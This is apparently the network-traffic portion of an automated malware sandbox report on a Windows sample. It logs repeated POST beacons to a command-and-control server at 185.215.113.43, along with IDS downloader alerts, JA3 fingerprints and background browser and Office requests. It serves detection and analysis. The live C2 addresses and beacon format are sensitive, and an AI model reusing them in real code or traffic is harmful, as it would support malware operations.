Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:51556 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:62262 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:62388 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:62395 -> 185.215.113.16:80
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49779 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBECC60 PR_Recv, 0_2_6CBECC60
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
